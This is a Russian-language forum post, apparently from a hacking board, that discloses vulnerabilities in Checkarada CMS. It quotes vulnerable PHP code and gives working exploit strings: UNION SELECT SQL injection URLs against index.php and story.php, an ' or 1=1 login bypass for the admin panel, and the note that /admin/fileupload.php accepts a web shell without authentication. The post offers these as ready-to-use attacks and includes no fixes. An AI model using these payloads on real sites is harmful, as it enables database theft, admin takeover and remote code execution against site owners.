Старый 24.02.2011, 03:19   #1
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию Checkarada CMS

Checkarada CMS
http://sourceforge.net/projects/checkaradacms/

SQLi
Need:
mq = off

index.php
PHP код:
$menu=$_GET['menu'];

        if(
$menu == "")

        { 
                       
//...
        
}

        else

        {

            
$hits 0;

            
$hitsquery="select * from menu where name = '$menu'";

            
$hitsresults=mysql_query($hitsquery);

            
$hitsi=0;

            
$hits=mysql_result($hitsresults$hitsi"hits");

            
$hits++;

            
$hitsupdatequery="update menu set hits = $hits where name = '$menu'";

            
mysql_query($hitsupdatequery);

            
$query2="select * from pages where menu = '$menu' and issue = '$issuenumber' order by porder ASC";

            
$results2=mysql_query($query2);

            
$num2=@@mysql_num_rows($results2);

        } 
Данные полученные от 1 запроса (к таблце menu) нигде не используются, кроме апдейта посещений. Второй же селект (к таблице pages) имеет вывод.
Эксплуатация:
Код:
http://localhost/cmsdemo/index.php?menu=Welcome'+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11-- 1
SQli
Need:
mq = off

story.php
PHP код:
//...
$id=$_GET['id'];

                 
$query2="select * from pages where id = '$id' order by id ASC";

                 
$results2=mysql_query($query2);

                 
$num2=@@mysql_num_rows($results2);

                 
$i2=0;

//... 
Эксплуатация:
Код:
http://localhost/cmsdemo/story.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11-- 1
Почти все остальные скрипты также подвержены скулям

Authorization bypass

/admin/login2.php
PHP код:
password=$_POST['password'];

$username=$_POST['username'];

$_SESSION['username']=$_POST['username'];

$query="select * from admin where username = '$username' and password = '$password'";

$result=mysql_query($query);

$num=mysql_num_rows($result);

if(
$num >= 1)

{

    
$_SESSION['login'] = 1;
           
//... 
Эксплуатация:
Код:
Username: ' or 1=1-- 1
Shell upload

/admin/uploader.php
PHP код:
$target_path "../images/";



$target_path $target_path basename$_FILES['uploadedfile']['name']); 



if(
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

    echo 
"The file ".  basename$_FILES['uploadedfile']['name']). 

    
" has been uploaded";

} else{
  
//... 
По пути /admin/fileupload.php уже лежит форма, прав админа не надо, шелл будет в папке images.
~d0s~ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot